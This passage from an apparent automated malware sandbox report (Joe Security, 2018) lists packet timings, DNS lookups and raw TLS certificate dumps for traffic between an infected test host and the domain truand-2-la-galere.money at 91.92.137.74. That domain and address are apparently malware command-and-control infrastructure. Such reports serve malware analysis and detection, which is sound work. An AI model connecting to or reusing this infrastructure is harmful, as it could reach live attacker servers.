Mai 7, 2018 14:51:24.207071066 MESZ 443 49214 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:24.999526024 MESZ 443 49214 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:24.999700069 MESZ 49214 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 58 of 149
Mai 7, 2018 14:51:25.280930996 MESZ 49214 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:25.280961990 MESZ 443 49214 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:25.287101030 MESZ 49214 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:25.287126064 MESZ 443 49214 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:25.697721004 MESZ 443 49214 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:25.697900057 MESZ 49214 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:25.697936058 MESZ 443 49214 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:25.698018074 MESZ 49214 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:25.699800014 MESZ 49214 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:25.699963093 MESZ 443 49214 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:25.700050116 MESZ 49214 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:25.925775051 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:25.925848961 MESZ 443 49215 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:25.925982952 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:25.927695036 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:25.927731037 MESZ 443 49215 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:26.590641022 MESZ 443 49215 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:26.590735912 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:26.778919935 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:26.778945923 MESZ 443 49215 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:26.785649061 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:26.785669088 MESZ 443 49215 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:27.096642017 MESZ 443 49215 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:27.096735954 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.096757889 MESZ 443 49215 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:27.097254038 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.097275019 MESZ 443 49215 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:27.098086119 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.098216057 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.098305941 MESZ 443 49215 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:27.098440886 MESZ 49215 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.225277901 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.225330114 MESZ 443 49216 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:27.225446939 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.226850986 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.226878881 MESZ 443 49216 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:27.770447016 MESZ 443 49216 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:27.770550966 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.820679903 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.820713043 MESZ 443 49216 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:27.827807903 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:27.827835083 MESZ 443 49216 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:28.041178942 MESZ 443 49216 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:28.041333914 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.041363955 MESZ 443 49216 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:28.043067932 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.043093920 MESZ 443 49216 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:28.047049046 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.271234035 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.271365881 MESZ 443 49216 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:28.272211075 MESZ 49216 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.398866892 MESZ 49217 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.398942947 MESZ 443 49217 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:28.399215937 MESZ 49217 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.400495052 MESZ 49217 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.400538921 MESZ 443 49217 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:28.899020910 MESZ 443 49217 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:28.899207115 MESZ 49217 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.930330992 MESZ 49217 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.930361986 MESZ 443 49217 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:28.936846972 MESZ 49217 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:28.936903000 MESZ 443 49217 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:29.302527905 MESZ 443 49217 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:29.302795887 MESZ 49217 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:29.302823067 MESZ 443 49217 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:29.311250925 MESZ 49217 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:29.313954115 MESZ 49217 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 59 of 149
Mai 7, 2018 14:51:29.314186096 MESZ 443 49217 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:29.314917088 MESZ 49217 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:29.590153933 MESZ 49218 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:29.590214968 MESZ 443 49218 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:29.590341091 MESZ 49218 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:29.591768026 MESZ 49218 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:29.591793060 MESZ 443 49218 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:30.110835075 MESZ 443 49218 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:30.111113071 MESZ 49218 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:30.130450964 MESZ 49218 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:30.130568027 MESZ 443 49218 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:30.138745070 MESZ 49218 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:30.138782978 MESZ 443 49218 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:30.495927095 MESZ 443 49218 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:30.496085882 MESZ 49218 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:30.496140003 MESZ 443 49218 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:30.502765894 MESZ 49218 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:30.941504002 MESZ 49218 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:30.941689968 MESZ 443 49218 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:30.942125082 MESZ 49218 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:31.068046093 MESZ 49219 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:31.068104029 MESZ 443 49219 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:31.068167925 MESZ 49219 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:31.069176912 MESZ 49219 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:31.069207907 MESZ 443 49219 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:31.782279015 MESZ 443 49219 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:31.782521963 MESZ 49219 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:31.791382074 MESZ 49219 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:31.791449070 MESZ 443 49219 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:31.796864986 MESZ 49219 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:31.796895027 MESZ 443 49219 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:32.156567097 MESZ 443 49219 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:32.156727076 MESZ 49219 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:32.156758070 MESZ 443 49219 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:32.157248974 MESZ 49219 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:32.157921076 MESZ 49219 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:32.158001900 MESZ 443 49219 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:32.158116102 MESZ 49219 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:32.268018961 MESZ 49220 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:32.268065929 MESZ 443 49220 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:32.268140078 MESZ 49220 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:32.269782066 MESZ 49220 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:32.269809961 MESZ 443 49220 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:32.784292936 MESZ 443 49220 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:32.784446955 MESZ 49220 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:32.804702997 MESZ 49220 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:32.804732084 MESZ 443 49220 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:32.811327934 MESZ 49220 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:32.811358929 MESZ 443 49220 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:33.140250921 MESZ 443 49220 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:33.140520096 MESZ 49220 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:33.140562057 MESZ 443 49220 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:33.141038895 MESZ 49220 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:33.141376972 MESZ 49220 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:33.141726971 MESZ 443 49220 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:33.141849995 MESZ 49220 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:33.479746103 MESZ 49221 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:33.479799986 MESZ 443 49221 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:33.480123997 MESZ 49221 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:33.481240034 MESZ 49221 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:33.481271029 MESZ 443 49221 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:34.041851044 MESZ 443 49221 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:34.041918039 MESZ 49221 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:34.043083906 MESZ 49221 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:34.043106079 MESZ 443 49221 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:34.044675112 MESZ 49221 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:34.044697046 MESZ 443 49221 91.92.137.74 192.168.1.81
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 60 of 149
Mai 7, 2018 14:51:34.403759956 MESZ 443 49221 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:34.403845072 MESZ 49221 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:34.403867006 MESZ 443 49221 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:34.404123068 MESZ 49221 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:34.404144049 MESZ 443 49221 91.92.137.74 192.168.1.81
Mai 7, 2018 14:51:34.404304028 MESZ 49221 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:34.404372931 MESZ 49221 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:51:34.404427052 MESZ 49221 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Timestamp Source Port Dest Port Source IP Dest IP
Mai 7, 2018 14:49:36.631899118 MESZ 63700 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:36.814659119 MESZ 53 63700 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:50.485364914 MESZ 54244 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:50.615817070 MESZ 53 54244 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:50.626178980 MESZ 60413 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:50.746747017 MESZ 53 60413 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:57.409387112 MESZ 49912 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:57.457447052 MESZ 53 49912 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:59.604815960 MESZ 62993 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:59.656533003 MESZ 53 62993 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:59.668673992 MESZ 58780 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:59.710364103 MESZ 53 58780 8.8.8.8 192.168.1.81
Mai 7, 2018 14:50:20.956351995 MESZ 54934 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:50:21.522135973 MESZ 53 54934 8.8.8.8 192.168.1.81
Mai 7, 2018 14:50:21.526216030 MESZ 62845 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:50:21.625046015 MESZ 53 62845 8.8.8.8 192.168.1.81
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Mai 7, 2018 14:49:36.631899118 MESZ 192.168.1.81 8.8.8.8 0xe63b Standard query (0)
truand-2-la-galere.money
A (IP address) IN (0x0001)
Mai 7, 2018 14:49:57.409387112 MESZ 192.168.1.81 8.8.8.8 0xe65e Standard query (0)
truand-2-la-galere.money
A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class
Mai 7, 2018 14:49:36.814659119 MESZ
8.8.8.8 192.168.1.81 0xe63b No error (0) truand-2-la-galere.money
91.92.137.74 A (IP address) IN (0x0001)
Mai 7, 2018 14:49:57.457447052 MESZ
8.8.8.8 192.168.1.81 0xe65e No error (0) truand-2-la-galere.money
91.92.137.74 A (IP address) IN (0x0001)
truand-2-la-galere.money
TimestampSourcePort
DestPort Source IP Dest IP Subject Issuer
NotBefore
NotAfter Raw
UDP Packets
DNS Queries
DNS Answers
HTTP Request Dependency Graph
HTTPS Packets
Copyright Joe Security LLC 2018 Page 61 of 149
Mai 7, 2018 14:49:49.415469885 MESZ
443 49162 91.92.137.74 192.168.1.81 CN=truand-2-la-galere.money
CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
Sun May 06 14:49:49 CEST 2018
Mon May 06 14:49:49 CEST 2019
[[ Version: V3 Subject: CN=truand-2-la-galere.money Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 173482083284325052510782864429137664633579691511543703039539002342296275109238117625872040139262896379538795260129849870433580344922031107699417419151540910326435169336338847748055467257593289358534582447761859028139174157241477124077669012417476784832342735303634755439494836929402863720187668290571419613987 public exponent: 3 Validity: [From: Sun May 06 14:49:49 CEST 2018, To: Mon May 06 14:49:49 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 0311340b 93cf92e2 c28a4c49 0bc38176 5929]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: truand-2-la-galere.money][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E7 21 6A 88 08 3C 29 7D AE FF C8 DF 28 2B DB 46 .!j..<).....(+.F0010: 8D F2 7E 77 ...w]]] Algorithm: [SHA1withRSA] Signature:0000: 4D A4 34 D2 89 ED AD CF EE 3C 67 50 EE D2 A2 20 M.4......<gP... 0010: A3 07 52 C5 77 53 1A 87 74 49 50 8F 36 17 08 DD ..R.wS..tIP.6...0020: 5E 05 16 D8 18 1C AF 71 E2 02 D3 0F FD 70 94 51 ......q.....p.Q0030: 15 86 58 D2 E1 A4 11 54 6F F4 5E 8F BA CD F6 FF ..X....To. .....0040: EB AA 07 0E EF 33 E2 0F D9 35 0B 68 C2 71 85 F5 .....3...5.h.q..0050: 12 EC EE A2 40 47 2E 35 7F 33 28 AD B8 3D 9E FB [email protected](..=..0060: F0 ED 92 7A 55 5E B4 F3 98 C6 41 F0 94 D1 49 77 ...zU ....A...Iw0070: 3D 2A 5A 99 4E 3B 9D A1 88 E0 35 97 4E B5 A6 2C =*Z.N;....5.N..,0080: 5E 91 5C 15 73 45 86 16 30 91 91 79 42 00 99 C5 .\.sE..0..yB...0090: BC 54 D1 02 88 91 CE 7F DA 85 1B DC 37
E8 9A F6 .T..........7...00A0: F5 EA 72 2D A2 AC 28 09 30 9E 9B 32 57 30 5F EF ..r-..(.0..2W0_.00B0: 99 02 FA 13 55 00 7B 98 AE ED 09 99 9E 5E 03 51 ....U........ .Q00C0: 13 30 22 05 00 66 8C AE 01 D7 7E 85 49 FE 5B AB .0"..f......I.[.00D0: B8 88 95 CE F9 54 13 36 9C BC 44 9C 55 C6 01 C0 .....T.6..D.U...00E0: 91 FD FC F9 13 FA FA BE CD F2 38 FD 80 CD D8 FA ..........8.....00F0: 67 45 3E 65 12 1C 04 EF 86 4A C2 C7 21 FC 59 D9 gE>e.....J..!.Y.0100: BC 07 2C 8F 92 AC E2 89 04 19 C2 0A 14 5B 93 BF ..,..........[..0110: 3C 07 EA B8 35 A9 37 09 0A BC ED CF FB DE 67 EF <...5.7.......g.0120: F3 9A 5B 28 17 71 24 61 DB 36 5E D3 11 1A 9D 13 ..[(.q$a.6 .....0130: 81 88 00 73 BF 6A E7 39 0E 50 97 7B C3 8A 13 65 ...s.j.9.P.....e0140: 07 6A 37 63 8E 35 61 71 6A 92 F1 13 EE 77 FD F6 .j7c.5aqj....w..0150: 80 B0 D8 DA A5 43 4E 8E 4A 54 C0 DF 4C 8F 82 73 .....CN.JT..L..s0160: F7 63 13 26 09 31 04 F8 D7 43 A0 8D F1 B9 53 2B .c.&.1...C....S+0170: 42 06 C6 50 70 E1 85 54 B7 F8 EB 2A C1 E2 91 9A B..Pp..T...*....0180: 42 FB AA 11 3A 2F DB 95 D1 69 4C 76 A0 75 CE 23 B...:/...iLv.u.#0190: 56 6E B0 01 AC 84 08 46 5C 96 33 A7 E9 4B 19 B2 Vn.....F\.3..K..01A0: 59 10 12 45 56 A1 52 72 52 EC 25 77 D4 2F E8 16 Y..EV.RrR.%w./..01B0: AB 73 3B F2 8C AE AF C0 8E 30 52 37 7E 59 7F C3 .s;......0R7.Y..01C0: EB 01 83 A0 98 0A 8A 13 84 F9 8C D9 6A 18 10 5D ............j..]01D0: 24 D9 88 D9 51 73 19 C3 5E 0C 15 9D 1C 78 8B D5 $...Qs.. ....x..01E0: F0 A9 74 F1 28 58 23 BD 44 CC 2D B3 CE E2 46 57 ..t.(X#.D.-...FW01F0: BF 4D D8 6C 38 09 8C 5F CD 30 6A C0 3A 86 77 DF .M.l8.._.0j.:.w.]
TimestampSourcePort
DestPort Source IP Dest IP Subject Issuer
NotBefore
NotAfter Raw
Copyright Joe Security LLC 2018 Page 62 of 149
Mai 7, 2018 14:49:49.415469885 MESZ
443 49162 91.92.137.74 192.168.1.81 CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
Tue Mar 17 15:16:38 CET 2015
Thu Mar 09 15:16:38 CET 2045
[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 [email protected]../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1 ...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y` d..n, ..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 ..... ...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
TimestampSourcePort
DestPort Source IP Dest IP Subject Issuer
NotBefore
NotAfter Raw
Copyright Joe Security LLC 2018 Page 63 of 149
Mai 7, 2018 14:49:58.977407932 MESZ
443 49165 91.92.137.74 192.168.1.81 CN=truand-2-la-galere.money
CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US
Sun May 06 14:49:49 CEST 2018
Mon May 06 14:49:49 CEST 2019
[[ Version: V3 Subject: CN=truand-2-la-galere.money Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 173482083284325052510782864429137664633579691511543703039539002342296275109238117625872040139262896379538795260129849870433580344922031107699417419151540910326435169336338847748055467257593289358534582447761859028139174157241477124077669012417476784832342735303634755439494836929402863720187668290571419613987 public exponent: 3 Validity: [From: Sun May 06 14:49:49 CEST 2018, To: Mon May 06 14:49:49 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 0311340b 93cf92e2 c28a4c49 0bc38176 5929]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: truand-2-la-galere.money][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E7 21 6A 88 08 3C 29 7D AE FF C8 DF 28 2B DB 46 .!j..<).....(+.F0010: 8D F2 7E 77 ...w]]] Algorithm: [SHA1withRSA] Signature:0000: 4D A4 34 D2 89 ED AD CF EE 3C 67 50 EE D2 A2 20 M.4......<gP... 0010: A3 07 52 C5 77 53 1A 87 74 49 50 8F 36 17 08 DD 